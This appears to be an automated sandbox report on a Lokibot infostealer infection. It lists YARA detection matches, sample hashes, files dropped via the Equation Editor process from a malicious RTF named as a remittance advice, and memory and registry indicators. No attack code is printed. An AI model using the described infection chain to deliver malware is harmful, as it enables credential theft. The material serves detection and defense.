Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Screenshot number: 4 Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
Source: sharonzx[1].exe.2.dr, BufferingPage.cs Long String: Length: 150953
Source: sharon38892.exe.2.dr, BufferingPage.cs Long String: Length: 150953
Source: XxENUzWteJXT.exe.5.dr, BufferingPage.cs Long String: Length: 150953
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\sharon38892.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00255348 5_2_00255348
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_002504B4 5_2_002504B4
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00255808 5_2_00255808
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00259879 5_2_00259879
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00251A10 5_2_00251A10
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00251E8B 5_2_00251E8B
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00259150 5_2_00259150
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025D218 5_2_0025D218
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00255344 5_2_00255344
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00252358 5_2_00252358
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025C4A0 5_2_0025C4A0
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025C8F8 5_2_0025C8F8
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025DCF0 5_2_0025DCF0
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025CD20 5_2_0025CD20
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025CD30 5_2_0025CD30
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00250D78 5_2_00250D78
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00251E03 5_2_00251E03
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00251E18 5_2_00251E18
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00175348 14_2_00175348
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_001704B4 14_2_001704B4
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00175808 14_2_00175808
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00179879 14_2_00179879
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00171A10 14_2_00171A10
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00171E8B 14_2_00171E8B
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00179150 14_2_00179150
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017D218 14_2_0017D218
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00172358 14_2_00172358
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00175344 14_2_00175344
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017C4A0 14_2_0017C4A0
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017C8F8 14_2_0017C8F8
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017C8E9 14_2_0017C8E9
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017DCF0 14_2_0017DCF0
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017CD30 14_2_0017CD30
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017CD20 14_2_0017CD20
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00170D78 14_2_00170D78
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00171E18 14_2_00171E18
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00171E03 14_2_00171E03
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_0040549C 21_2_0040549C
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_004029D4 21_2_004029D4
Source: tmp5C05.tmp.5.dr OLE indicator, VBA macros: true
Source: tmp7D2B.tmp.14.dr OLE indicator, VBA macros: true
Source: tmp5C05.tmp.5.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: tmp7D2B.tmp.14.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory Jump to behavior
Source: SCB REmittance Advice.doc, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
